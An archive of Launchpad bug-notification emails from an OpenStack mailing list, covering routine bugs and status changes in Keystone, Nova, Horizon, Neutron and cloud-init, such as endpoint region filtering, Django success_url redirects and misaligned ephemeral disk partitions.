Status in Keystone:
  Invalid
Status in OpenStack Compute (nova):
  Won't Fix
Status in oslo-incubator:
  Won't Fix
Status in testtools:
  Incomplete
Status in Trove:
  Triaged

Bug description:
  Reduce code duplication by pulling DictKeysMismatch, DictMismatch and
  DictMatches from glanceclient/tests/matchers.py into a library (e.g.
  testtools)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ironic/+bug/1199536/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1418956] Re: Test utilities assume use of assignment api

2015-08-20 Thread David Stanek
We can reopen this if it becomes something bigger. Right now there's no
need and some debate about why drivers shouldn't implement the whole
API.

** Changed in: keystone
   Status: In Progress => Won't Fix

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1418956

Title:
  Test utilities assume use of assignment api

Status in Keystone:
  Won't Fix

Bug description:
  Our test fixtures and v3 test utils call the assignment API under the
  hood to create assignments. This is normally absolutely fine, although
  for developers looking to replace the assignments engine with their
  own, such APIs might fail. While a fuller solution would be to allow
  the disabling of all existing assignments tests, a simple thing we can
  do to let out-of-tree experimentation to at least use our test
  fixtures/utils is not to error out if the assignment APIs return
  NotImplemented.

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1418956/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1471997] Re: nova MAX_FUNC value in nova/pci/devspec.py is too low

2015-08-20 Thread Chris Friesen
Jay Pipes helpfully pointed out that the MAX_FUNC value was defined by
the PCI spec, and didn't refer to the SRIOV VF value, but rather the PCI
device function.

The original issue turned out to be a local problem generating the PCI
whitelist.

** Changed in: nova
   Status: In Progress => Invalid

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1471997

Title:
  nova MAX_FUNC value in nova/pci/devspec.py is too low

Status in OpenStack Compute (nova):
  Invalid

Bug description:
  The MAX_FUNC value in nova/pci/devspec.py is set to 0x7.  This limits
  us to a relatively small number of VFs per PF, which is annoying when
  trying to use SRIOV in any sort of serious way.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1471997/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1482772] Re: Region filtering for endpoints does not work

2015-08-20 Thread Lin Hua Cheng
OSC and KSC do already have the filter; however, the filter they pass
is "region" instead of "region_id".

There is still some work needed to change the filter name to region_id.
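
A rough illustration of the rename being discussed (assumed parameter
handling, not the actual keystoneclient code):

    # Translate the user-facing 'region' filter into the 'region_id'
    # query parameter that the v3 /endpoints API understands.
    def build_endpoint_filters(region=None, interface=None, service_id=None):
        filters = {}
        if region is not None:
            filters['region_id'] = region   # previously sent as 'region'
        if interface is not None:
            filters['interface'] = interface
        if service_id is not None:
            filters['service_id'] = service_id
        return filters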

** Changed in: python-keystoneclient
   Status: Invalid => Confirmed

** Changed in: python-openstackclient
   Status: Invalid => Confirmed

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1482772

Title:
  Region filtering for endpoints does not work

Status in Keystone:
  In Progress
Status in python-keystoneclient:
  Confirmed
Status in python-openstackclient:
  Confirmed

Bug description:
  When I run “openstack endpoint list --os-url http://192.168.33.10:5000/v3
  --os-identity-api-version=3 --service identity --interface public --region
  RegionTwo” I would expect it to list only endpoints from RegionTwo. But I
  get the identity endpoint from RegionOne. Here is the output:

  +----------------------------------+-----------+--------------+--------------+---------+-----------+--------------------------------+
  | ID                               | Region    | Service Name | Service Type | Enabled | Interface | URL                            |
  +----------------------------------+-----------+--------------+--------------+---------+-----------+--------------------------------+
  | 4b3efc615c044fb4a2c70ca2e5e7bba9 | RegionOne | keystone     | identity     | True    | public    | http://192.168.33.10:5000/v2.0 |
  +----------------------------------+-----------+--------------+--------------+---------+-----------+--------------------------------+

  As this snippet from the openstackclient debug output shows, the
  client sends the correct query to keystone. So I assume this is a
  filtering problem in keystone.

  DEBUG: requests.packages.urllib3.connectionpool "GET
  /v3/endpoints?interface=public&service_id=050872861656437184778a822032d8d6&region=RegionTwo
  HTTP/1.1" 200 506
  DEBUG: keystoneclient.session RESP: [200] content-length: 506 vary:
  X-Auth-Token keep-alive: timeout=5, max=96 server: Apache/2.4.7 (Ubuntu)
  connection: Keep-Alive date: Fri, 07 Aug 2015 19:37:08 GMT content-type:
  application/json x-openstack-request-id:
  req-72481573-7fff-4ae0-9a2f-33584b476bd3
  RESP BODY: {"endpoints": [{"region_id": "RegionOne", "links": {"self":
  "http://192.168.33.10:35357/v3/endpoints/4b3efc615c044fb4a2c70ca2e5e7bba9"},
  "url": "http://192.168.33.10:5000/v2.0", "region": "RegionOne", "enabled":
  true, "interface": "public", "service_id": "050872861656437184778a822032d8d6",
  "id": "4b3efc615c044fb4a2c70ca2e5e7bba9"}], "links": {"self":
  "http://192.168.33.10:35357/v3/endpoints?interface=public&service_id=050872861656437184778a822032d8d6&region=RegionTwo",
  "previous": null, "next": null}}

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1482772/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487251] [NEW] Creating new user does not require project

2015-08-20 Thread Thai Tran
Public bug reported:

When creating a new user, adding the user to a project is optional. The
REST api needs to respect this.

Reference:
https://github.com/openstack/horizon/blob/master/openstack_dashboard/api/rest/keystone.py#L91

** Affects: horizon
 Importance: Medium
 Assignee: Thai Tran (tqtran)
 Status: In Progress


** Tags: low-hanging-fruit

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1487251

Title:
  Creating new user does not require project

Status in OpenStack Dashboard (Horizon):
  In Progress

Bug description:
  When creating a new user, adding the user to a project is optional.
  The REST api needs to respect this.

  Reference:
  
https://github.com/openstack/horizon/blob/master/openstack_dashboard/api/rest/keystone.py#L91
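
  A rough sketch of the behaviour being asked for (placeholder callables,
  not the actual Horizon REST handler at the link above):

      def create_user(request, data, user_create, add_to_project):
          # user_create / add_to_project stand in for the real keystone calls
          user = user_create(request, data)
          project = data.get('project')
          if project:
              # the project grant is optional and only applied when supplied
              add_to_project(request, user, project)
          return user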

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1487251/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487254] [NEW] Get simple modal working again

2015-08-20 Thread Thai Tran
Public bug reported:

The simple-modal code was refactored and linted. It is now broken and
does not work properly.

** Affects: horizon
 Importance: Medium
 Assignee: Thai Tran (tqtran)
 Status: In Progress


** Tags: low-hanging-fruit

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1487254

Title:
  Get simple modal working again

Status in OpenStack Dashboard (Horizon):
  In Progress

Bug description:
  The simple-modal code was refactored and linted. It is now broken and
  does not work properly.

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1487254/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487271] [NEW] success_url miss 'reverse_lazy' in admin volume type panel

2015-08-20 Thread qiaomin032
Public bug reported:

In the admin volume type panel, several success_url attributes in the views
are missing 'reverse_lazy', which results in the cancel action redirecting to
the wrong URL. For example, if you right-click the "Create Volume Type" button,
open it in a new page, and click the Cancel button, an error is raised.
See the attachment for more detail.

** Affects: horizon
 Importance: Undecided
 Status: New

** Attachment added: "admin_volume_type.jpg"
   
https://bugs.launchpad.net/bugs/1487271/+attachment/4449947/+files/admin_volume_type.jpg

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1487271

Title:
  success_url miss 'reverse_lazy' in admin volume type panel

Status in OpenStack Dashboard (Horizon):
  New

Bug description:
  In the admin volume type panel, several success_url attributes in the views
  are missing 'reverse_lazy', which results in the cancel action redirecting to
  the wrong URL. For example, if you right-click the "Create Volume Type"
  button, open it in a new page, and click the Cancel button, an error is
  raised.
  See the attachment for more detail.

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1487271/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487275] [NEW] add an API to show services registered in neutron deployment

2015-08-20 Thread yong sheng gong
Public bug reported:

problem description:
===

There is no API for an operator to know which services are enabled by
neutron via 'service_plugins' in neutron.conf.

After change:
==
Provide an API for administrators to look up the services enabled in neutron.

** Affects: neutron
 Importance: Undecided
 Assignee: yong sheng gong (gongysh)
 Status: New

** Changed in: neutron
 Assignee: (unassigned) => yong sheng gong (gongysh)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1487275

Title:
  add an API to show services registered in neutron deployment

Status in neutron:
  New

Bug description:
  problem description:
  ===

  There is no API for an operator to know which services are enabled by
  neutron via 'service_plugins' in neutron.conf.

  After change:
  ==
  Provide an API for administrators to look up the services enabled in neutron.

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1487275/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1450963] Re: can_access caching is storing too much data in the session

2015-08-20 Thread Lin Hua Cheng
Didn't have time to work on the BP, re-opening this bug instead

** Changed in: horizon
   Status: Invalid => Confirmed

** Changed in: horizon
Milestone: None => liberty-3

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1450963

Title:
  can_access caching is storing too much data in the session

Status in OpenStack Dashboard (Horizon):
  Confirmed

Bug description:
  This accounts for 34% of the session size.

  Related patch: https://review.openstack.org/#/c/120790/

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1450963/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1482772] Re: Region filtering for endpoints does not work

2015-08-20 Thread Lin Hua Cheng
No need to fix OSC, KSC will perform the translation from region to
region_id.

** Changed in: python-openstackclient
   Status: Confirmed => Invalid

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1482772

Title:
  Region filtering for endpoints does not work

Status in Keystone:
  In Progress
Status in python-keystoneclient:
  Confirmed
Status in python-openstackclient:
  Invalid

Bug description:
  When I run “openstack endpoint list --os-url http://192.168.33.10:5000/v3
  --os-identity-api-version=3 --service identity --interface public --region
  RegionTwo” I would expect it to list only endpoints from RegionTwo. But I
  get the identity endpoint from RegionOne. Here is the output:

  +----------------------------------+-----------+--------------+--------------+---------+-----------+--------------------------------+
  | ID                               | Region    | Service Name | Service Type | Enabled | Interface | URL                            |
  +----------------------------------+-----------+--------------+--------------+---------+-----------+--------------------------------+
  | 4b3efc615c044fb4a2c70ca2e5e7bba9 | RegionOne | keystone     | identity     | True    | public    | http://192.168.33.10:5000/v2.0 |
  +----------------------------------+-----------+--------------+--------------+---------+-----------+--------------------------------+

  As this snippet from the openstackclient debug output shows, the
  client sends the correct query to keystone. So I assume this is a
  filtering problem in keystone.

  DEBUG: requests.packages.urllib3.connectionpool "GET
  /v3/endpoints?interface=public&service_id=050872861656437184778a822032d8d6&region=RegionTwo
  HTTP/1.1" 200 506
  DEBUG: keystoneclient.session RESP: [200] content-length: 506 vary:
  X-Auth-Token keep-alive: timeout=5, max=96 server: Apache/2.4.7 (Ubuntu)
  connection: Keep-Alive date: Fri, 07 Aug 2015 19:37:08 GMT content-type:
  application/json x-openstack-request-id:
  req-72481573-7fff-4ae0-9a2f-33584b476bd3
  RESP BODY: {"endpoints": [{"region_id": "RegionOne", "links": {"self":
  "http://192.168.33.10:35357/v3/endpoints/4b3efc615c044fb4a2c70ca2e5e7bba9"},
  "url": "http://192.168.33.10:5000/v2.0", "region": "RegionOne", "enabled":
  true, "interface": "public", "service_id": "050872861656437184778a822032d8d6",
  "id": "4b3efc615c044fb4a2c70ca2e5e7bba9"}], "links": {"self":
  "http://192.168.33.10:35357/v3/endpoints?interface=public&service_id=050872861656437184778a822032d8d6&region=RegionTwo",
  "previous": null, "next": null}}

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1482772/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1351215] Re: Outdated information in post live-migration notification

2015-08-20 Thread Zhenzan Zhou
Tried with the latest code, and got the notifications in the congress nova
driver:

live migration from node-01 (source node, also controller node) to
node-02 (dest node):

2015-08-21 03:26:36.717 INFO congress.datasources.nova_driver [-] Info: Handled 
notification from compute.node-02:compute.instance.live_migration.pre.start
2015-08-21 03:26:36.717 INFO congress.datasources.nova_driver [-] Info: 
state_description = migrating, state = active
2015-08-21 03:26:36.718 INFO congress.datasources.nova_driver [-] Info: node = 
node-01, host = node-01
2015-08-21 03:26:39.648 INFO congress.datasources.nova_driver [-] Info: Handled 
notification from compute.node-02:compute.instance.live_migration.pre.end
2015-08-21 03:26:39.649 INFO congress.datasources.nova_driver [-] Info: 
state_description = migrating, state = active
2015-08-21 03:26:39.649 INFO congress.datasources.nova_driver [-] Info: node = 
node-01, host = node-01
2015-08-21 03:26:45.220 INFO congress.datasources.nova_driver [-] Info: Handled 
notification from compute.node-01:compute.instance.live_migration._post.start
2015-08-21 03:26:45.220 INFO congress.datasources.nova_driver [-] Info: 
state_description = migrating, state = active
2015-08-21 03:26:45.221 INFO congress.datasources.nova_driver [-] Info: node = 
node-01, host = node-01
2015-08-21 03:26:46.098 INFO congress.datasources.nova_driver [-] Info: Handled 
notification from compute.node-01:compute.instance.live_migration._post.end
2015-08-21 03:26:46.099 INFO congress.datasources.nova_driver [-] Info: 
state_description = migrating, state = active
2015-08-21 03:26:46.099 INFO congress.datasources.nova_driver [-] Info: node = 
node-01, host = node-01
2015-08-21 03:26:46.225 INFO congress.datasources.nova_driver [-] Info: Handled 
notification from 
compute.node-02:compute.instance.live_migration.post.dest.start
2015-08-21 03:26:46.226 INFO congress.datasources.nova_driver [-] Info: 
state_description = migrating, state = active
2015-08-21 03:26:46.226 INFO congress.datasources.nova_driver [-] Info: node = 
node-01, host = node-01
2015-08-21 03:26:47.003 INFO congress.datasources.nova_driver [-] Info: Handled 
notification from compute.node-02:compute.instance.live_migration.post.dest.end
2015-08-21 03:26:47.003 INFO congress.datasources.nova_driver [-] Info: 
state_description = , state = active
2015-08-21 03:26:47.003 INFO congress.datasources.nova_driver [-] Info: node = 
node-02, host = node-02

So in the event compute.instance.live_migration._post.end, which is sent by
the source node, the state_description is still 'migrating', and it's correct
to still use the source node and host.  So I'll mark it as invalid.

** Changed in: nova
   Status: Confirmed => Invalid

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1351215

Title:
  Outdated information in post live-migration notification

Status in OpenStack Compute (nova):
  Invalid

Bug description:
  compute.instance.live_migration._post.end rpc notification gives
  outdated information about state, host, node (at least)

  compute.instance.live_migration.pre.start (source node)
  compute.instance.live_migration.pre.end (source node)
  compute.instance.live_migration._post.start (source node)
  compute.instance.live_migration.post.dest.start (destination node)
  compute.instance.live_migration.post.dest.end (destination node)
  compute.instance.live_migration._post.end (again source node with non-changed 
instance object data, with outdated info)

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1351215/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487271] Re: success_url miss 'reverse_lazy' in admin volume type panel

2015-08-20 Thread qiaomin032
** Changed in: horizon
   Status: In Progress => Invalid

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1487271

Title:
  success_url miss 'reverse_lazy' in admin volume type panel

Status in OpenStack Dashboard (Horizon):
  Invalid

Bug description:
  In the admin volume type panel,  several success_url in views miss 
'reverse_lazy', this result in the cancel action  redirect to wrong url.  For 
example, when right click the "Create Volume Type" button and open a new page, 
click the Cancel button will cast error.
  See the attachment for more detail.

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1487271/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487295] [NEW] success_url miss 'reverse_lazy' in admin volume type panel

2015-08-20 Thread qiaomin032
Public bug reported:

In the admin volume type panel, several success_url attributes in the views
are missing 'reverse_lazy'; this causes the Cancel action to redirect to the
wrong URL. For example, if you right-click the "Create Volume Type" button to
open it in a new page, clicking the Cancel button raises an error.
See the attachment for more detail.
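
A minimal sketch of the kind of fix this implies (the view class and URL name
below are illustrative, not Horizon's actual code): success_url should be
wrapped in reverse_lazy so the URL is resolved lazily rather than treated as a
literal path.

    from django.core.urlresolvers import reverse_lazy  # django.urls in newer Django
    from django.views.generic import FormView

    class CreateVolumeTypeView(FormView):
        # Broken: a bare URL name is never reversed, so Cancel redirects to a wrong URL
        # success_url = 'horizon:admin:volume_types:index'
        # Fixed: defer URL reversal until the value is actually needed
        success_url = reverse_lazy('horizon:admin:volume_types:index')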

** Affects: horizon
 Importance: Undecided
 Assignee: qiaomin032 (chen-qiaomin)
 Status: In Progress

** Attachment added: "admin_volume_type.jpg"
   
https://bugs.launchpad.net/bugs/1487295/+attachment/4449983/+files/admin_volume_type.jpg

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1487295

Title:
  success_url miss 'reverse_lazy' in admin volume type panel

Status in OpenStack Dashboard (Horizon):
  In Progress

Bug description:
  In the admin volume type panel, several success_url attributes in the views
  are missing 'reverse_lazy'; this causes the Cancel action to redirect to the
  wrong URL. For example, if you right-click the "Create Volume Type" button
  to open it in a new page, clicking the Cancel button raises an error.
  See the attachment for more detail.

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1487295/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487300] [NEW] Misaligned partitions for ephemeral drives (Xenapi)

2015-08-20 Thread Brooks Kaminski
Public bug reported:

Currently the code creates a misaligned partition on the ephemeral
drive during disk creation.  This happens because the code attempts to
start the partition at sector 0, which parted then defaults to sector 1.
When replicating this setup by hand using parted (as the code does), it
warns about the misalignment:

test@testbox:~# parted --script /dev/xvde -- mkpart primary 0 -0
Warning: The resulting partition is not properly aligned for best performance.

This can result in significantly slower read speeds from the disk and
some impact on write speeds.  The code responsible for the ephemeral
partition size configuration can be found at:

https://github.com/openstack/nova/blob/master/nova/virt/xenapi/vm_utils.py#L1043-L1057

And the actual parted command utilizing this can be found here:

https://github.com/openstack/nova/blob/master/nova/virt/xenapi/vm_utils.py#L992-L1006
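
For illustration only (this is not the patch under review below), the warning
goes away once the partition start is an explicitly aligned sector such as
2048 (1 MiB) rather than 0. A minimal Python sketch of such an invocation,
assuming parted is available on the host:

    import subprocess

    def make_aligned_primary_partition(dev_path):
        # Starting at sector 2048 (1 MiB) keeps the partition aligned for common
        # 4 KiB-sector and RAID-stripe geometries; a start of 0 (defaulting to
        # sector 1) does not.
        subprocess.check_call(
            ['parted', '--script', dev_path, '--',
             'mkpart', 'primary', '2048s', '-0'])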

I have already committed a simple change for this awaiting review --
Change ID: I2b33659d66ce5ba8a361386277c5fee47ddcde94

https://review.openstack.org/#/c/203323/

Testing for this bug can be accomplished by creating a VM with an
ephemeral drive and monitoring r/w speeds with the default partitioning
and then with custom partitioning (2048 start sector) using dd/hdparm,
etc.

** Affects: nova
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1487300

Title:
  Misaligned partitions for ephemeral drives (Xenapi)

Status in OpenStack Compute (nova):
  New

Bug description:
  Currently the code creates a misaligned partition on the ephemeral
  drive during disk creation.  This happens because the code attempts to
  start the partition at sector 0, which parted then defaults to sector 1.
  When replicating this setup by hand using parted (as the code does), it
  warns about the misalignment:

  test@testbox:~# parted --script /dev/xvde -- mkpart primary 0 -0
  Warning: The resulting partition is not properly aligned for best performance.

  This can result in significantly slower read speeds from the disk and
  some impact on write speeds.  The code responsible for the ephemeral
  partition size configuration can be found at:

  
https://github.com/openstack/nova/blob/master/nova/virt/xenapi/vm_utils.py#L1043-L1057

  And the actual parted command utilizing this can be found here:

  
https://github.com/openstack/nova/blob/master/nova/virt/xenapi/vm_utils.py#L992-L1006

  I have already committed a simple change for this awaiting review --
  Change ID: I2b33659d66ce5ba8a361386277c5fee47ddcde94

  https://review.openstack.org/#/c/203323/

  Testing for this bug can be accomplished by creating a VM with an
  ephemeral drive and monitoring r/w speeds with the default
  partitioning and then with custom partitioning (2048 start sector)
  using dd/hdparm, etc.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1487300/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487322] [NEW] fullstack oslo messaging deprecation warning for configuration

2015-08-20 Thread Miguel Angel Ajo
Public bug reported:

In the fullstack run logs for the server and the agents you can find the
following warnings:

2015-08-20 12:36:28.369 1898 WARNING oslo_config.cfg [-] Option 
"rabbit_virtual_host" from group "DEFAULT" is deprecated. Use option 
"rabbit_virtual_host" from group "oslo_messaging_rabbit".
2015-08-20 12:36:28.369 1898 WARNING oslo_config.cfg [-] Option "rabbit_hosts" 
from group "DEFAULT" is deprecated. Use option "rabbit_hosts" from group 
"oslo_messaging_rabbit".
2015-08-20 12:36:28.370 1898 WARNING oslo_config.cfg [-] Option "rabbit_userid" 
from group "DEFAULT" is deprecated. Use option "rabbit_userid" from group 
"oslo_messaging_rabbit".
2015-08-20 12:36:28.370 1898 WARNING oslo_config.cfg [-] Option 
"rabbit_password" from group "DEFAULT" is deprecated. Use option 
"rabbit_password" from group "oslo_messaging_rabbit".

** Affects: neutron
 Importance: Undecided
 Status: New


** Tags: fullstack

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1487322

Title:
  fullstack oslo messaging deprecation warning for configuration

Status in neutron:
  New

Bug description:
  In the fullstack run logs for the server and the agents you can find the
following warnings:

  2015-08-20 12:36:28.369 1898 WARNING oslo_config.cfg [-] Option 
"rabbit_virtual_host" from group "DEFAULT" is deprecated. Use option 
"rabbit_virtual_host" from group "oslo_messaging_rabbit".
  2015-08-20 12:36:28.369 1898 WARNING oslo_config.cfg [-] Option 
"rabbit_hosts" from group "DEFAULT" is deprecated. Use option "rabbit_hosts" 
from group "oslo_messaging_rabbit".
  2015-08-20 12:36:28.370 1898 WARNING oslo_config.cfg [-] Option 
"rabbit_userid" from group "DEFAULT" is deprecated. Use option "rabbit_userid" 
from group "oslo_messaging_rabbit".
  2015-08-20 12:36:28.370 1898 WARNING oslo_config.cfg [-] Option 
"rabbit_password" from group "DEFAULT" is deprecated. Use option 
"rabbit_password" from group "oslo_messaging_rabbit".

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1487322/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487323] [NEW] Grammar misses in manual “Networking API v2.0 (CURRENT)”

2015-08-20 Thread zhangjingwen
Public bug reported:

1. The description in the manual is as below:
"Use virtual networking services among devices that are managed by the 
OpenStack Compute serviceEnables users to associate IP address blocks and 
other network configuration settings with an OpenStack Networking network. "

Because "Use" is used by the first sentence and it is imperative
sentence, "Enables" in the last sentence is not correct. I think it
should be "Enable".

2. The description in the same location as above is as below:
"The Networking (neutron) API v2.0 combines the API v1.1 functionality with 
some essential Internet Protocol Address Management (IPAM) functionality." 

Because "some" is used and i think "some" here does not mean "certain",
the last "functionality" should be "functionalities".

3. The description in the same location as above is as below:
"Enables users to associate IP address blocks and other network configuration 
settings with an OpenStack Networking network. You can choose a specific IP 
address from the block or let OpenStack Networking choose the first available 
IP address. "

According to the context, the "block" in the last sentence should be
"blocks".

** Affects: neutron
 Importance: Undecided
 Assignee: zhangjingwen (zhangjingwen)
 Status: New

** Changed in: neutron
 Assignee: (unassigned) => zhangjingwen (zhangjingwen)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1487323

Title:
  Grammar misses in manual “Networking API v2.0 (CURRENT)”

Status in neutron:
  New

Bug description:
  1. The description in the manual is as below:
  "Use virtual networking services among devices that are managed by the 
OpenStack Compute serviceEnables users to associate IP address blocks and 
other network configuration settings with an OpenStack Networking network. "

  Because "Use" is used by the first sentence and it is imperative
  sentence, "Enables" in the last sentence is not correct. I think it
  should be "Enable".

  2. The description in the same location as above is as below:
  "The Networking (neutron) API v2.0 combines the API v1.1 functionality with 
some essential Internet Protocol Address Management (IPAM) functionality." 

  Because "some" is used and i think "some" here does not mean
  "certain", the last "functionality" should be "functionalities".

  3. The description in the same location as above is as below:
  "Enables users to associate IP address blocks and other network configuration 
settings with an OpenStack Networking network. You can choose a specific IP 
address from the block or let OpenStack Networking choose the first available 
IP address. "

  According to the context, the "block" in the last sentence should be
  "blocks".

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1487323/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1311463] Re: disk-setup unable to partition disks

2015-08-20 Thread Mathew Hodson
** Changed in: cloud-init (Ubuntu Utopic)
   Status: Confirmed => Won't Fix

** Changed in: cloud-init (Ubuntu Precise)
   Importance: Undecided => Medium

** Changed in: cloud-init (Ubuntu Trusty)
   Importance: Undecided => Medium

** Tags added: precise trusty

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to cloud-init.
https://bugs.launchpad.net/bugs/1311463

Title:
  disk-setup unable to partition disks

Status in cloud-init:
  Fix Committed
Status in cloud-init package in Ubuntu:
  Fix Released
Status in cloud-init source package in Precise:
  Confirmed
Status in cloud-init source package in Trusty:
  Confirmed
Status in cloud-init source package in Utopic:
  Won't Fix

Bug description:
  The problem is with is_disk_used in cc_disk_setup.py

  use_count is a list, which doesn't have a splitlines attribute.
  This is broken on Ubuntu Precise 12.04 with the latest updates.

  def is_disk_used(device):
      """
      Check if the device is currently used. Returns true if the device
      has either a file system or a partition entry
      is no filesystem found on the disk.
      """

      # If the child count is higher 1, then there are child nodes
      # such as partition or device mapper nodes
      use_count = [x for x in enumerate_disk(device)]
      if len(use_count.splitlines()) > 1:
          return True

      # If we see a file system, then its used
      _, check_fstype, _ = check_fs(device)
      if check_fstype:
          return True

      return False
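
  A minimal sketch of the implied fix (assuming enumerate_disk() yields one
  item per child device node, so the length of the list is already the child
  count this check needs):

      use_count = [x for x in enumerate_disk(device)]
      if len(use_count) > 1:   # a list has no splitlines(); compare its length directly
          return True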

To manage notifications about this bug go to:
https://bugs.launchpad.net/cloud-init/+bug/1311463/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
